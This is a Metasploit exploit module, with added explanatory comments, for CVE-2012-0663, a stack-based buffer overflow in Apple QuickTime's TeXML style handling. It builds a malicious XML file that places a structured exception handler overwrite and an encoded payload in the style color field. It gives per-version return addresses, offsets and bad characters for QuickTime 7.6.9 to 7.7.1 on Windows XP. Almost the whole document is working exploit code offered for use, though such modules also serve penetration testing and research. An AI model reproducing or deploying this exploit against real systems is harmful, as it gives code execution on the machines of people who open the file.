##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  # File-format module: it only writes a crafted TeXML document to disk
  # (see #exploit); the vulnerable component is reached when that file is
  # later opened in an affected QuickTime build (CVE-2012-0663, 'References').
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT  # provides file_create used in #exploit
  include Msf::Exploit::Remote::Seh # provides generate_seh_record used in #exploit

  # Registers the module metadata (description, references, payload
  # constraints, per-version targets) and the FILENAME option.
  #
  # @param info [Hash] metadata merged via update_info before being passed to super
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Apple QuickTime TeXML Style Element Stack Buffer Overflow',
        'Description' => %q{
          This module exploits a vulnerability found in Apple QuickTime. When handling
          a TeXML file, it is possible to trigger a stack-based buffer overflow, and then
          gain arbitrary code execution under the context of the user. This is due to the
          QuickTime3GPP.gtx component not handling certain Style subfields properly, storing
          user-supplied data on the stack, which results the overflow.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Alexander Gavrun', # Vulnerability Discovery
          'sinn3r', # Metasploit Module
          'juan vazquez' # Metasploit Module
        ],
        'References' => [
          [ 'OSVDB', '81934' ],
          [ 'CVE', '2012-0663' ],
          [ 'BID', '53571' ],
          [ 'ZDI', '12-107' ],
          [ 'URL', 'http://0x1byte.blogspot.com/2012/06/cve-2012-0663-and-cve-2012-0664-samples.html' ],
          [ 'URL', 'http://support.apple.com/kb/HT1222' ]
        ],
        'Payload' => {
          # The buffer built in #exploit is padded explicitly to a fixed length,
          # so no NOP sled is generated.
          'DisableNops' => true,
          # NUL, '#', '%', '<', '>', '}': the encoded payload is interpolated into
          # the `{color: ...}` style field of an XML document (see the heredoc in
          # #exploit), so these bytes would terminate or corrupt the surrounding
          # markup before it reaches the parser.
          'BadChars' => "\x00\x23\x25\x3c\x3e\x7d"
        },
        'Platform' => 'win',
        # Per-target constants consumed by #exploit:
        #   'Ret'    - POP/POP/RET gadget address in the named QuickTime.qts build
        #   'Offset' - bytes of filler before the SEH record
        #   'Max'    - total length of the generated buffer
        'Targets' => [
          [
            'QuickTime 7.7.1 on Windows XP SP3',
            {
              'Ret' => 0x66f1bdf8, # POP ESI/POP EDI/RET from QuickTime.qts (7.71.80.42)
              'Offset' => 643,
              'Max' => 13508
            }
          ],
          [
            'QuickTime 7.7.0 on Windows XP SP3',
            {
              'Ret' => 0x66F1BD66, # PPR from QuickTime.qts (7.70.80.34)
              'Offset' => 643,
              'Max' => 13508
            }
          ],
          [
            'QuickTime 7.6.9 on Windows XP SP3',
            {
              'Ret' => 0x66801042, # PPR from QuickTime.qts (7.69.80.9)
              'Offset' => 643,
              'Max' => 13508
            }
          ],
        ],
        'Privileged' => false,
        'DisclosureDate' => '2012-05-15',
        # Reliability, stability and side-effect ratings have not been assessed
        # for this module.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        # Name of the output file handed to file_create (default 'msf.xml').
        OptString.new('FILENAME', [ true, 'The file name.', 'msf.xml']),
      ]
    )
  end

  # Assembles the overflow buffer, embeds it in a TeXML document and writes
  # the document with file_create.
  #
  # Buffer layout, using the selected target's constants:
  #   rand_text(Offset) | SEH record for target.ret | payload.encoded | random padding up to Max
  #
  # @return [void]
  def exploit
    my_payload = rand_text(target['Offset'])
    my_payload << generate_seh_record(target.ret)
    my_payload << payload.encoded
    # Pad to the target's fixed total length. Assumes the encoded payload fits
    # within Max minus the preceding filler and SEH record; this is not
    # enforced here.
    my_payload << rand_text(target['Max'] - my_payload.length)

    # <<- preserves the leading indentation of each line; the gsub after the
    # heredoc removes the four-space block indent so the XML is written
    # starting at column 0. The buffer is interpolated into the {color: ...}
    # style subfield, which is the field named in the module description.
    texml = <<-eos
    <?xml version="1.0"?>
    <?quicktime type="application/x-quicktime-texml"?>

    <text3GTrack trackWidth="176.0" trackHeight="60.0" layer="1"
    language="eng" timeScale="600"
    transform="matrix(1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 1, 0, 1.0)">
      <sample duration="2400" keyframe="true">

        <description format="tx3g" displayFlags="ScrollIn"
        horizontalJustification="Left"
        verticalJustification="Top"
        backgroundColor="0%, 0%, 0%, 100%">

          <defaultTextBox x="0" y="0" width="176" height="60"/>
          <fontTable>
            <font id="1" name="Times"/>
          </fontTable>

          <sharedStyles>
            <style id="1">
              {font-table: 1} {font-size: 10}
              {font-style:normal}
              {font-weight: normal}
              {color: #{my_payload}%, 100%, 100%, 100%}
            </style>
          </sharedStyles>
        </description>

        <sampleData scrollDelay="200"
        highlightColor="25%, 45%, 65%, 100%"
        targetEncoding="utf8">

          <textBox x="10" y="10" width="156" height="40"/>
          <text styleID="1">What you need... Metasploit!</text>
          <highlight startMarker="1" endMarker="2"/>
          <blink startMarker="3" endMarker="4"/>
        </sampleData>
      </sample>
    </text3GTrack>
    eos

    # Strip exactly four leading spaces from every line (the heredoc's block indent).
    texml = texml.gsub(/^ {4}/, '')

    print_status("Creating '#{datastore['FILENAME']}'.")
    file_create(texml)
  end
end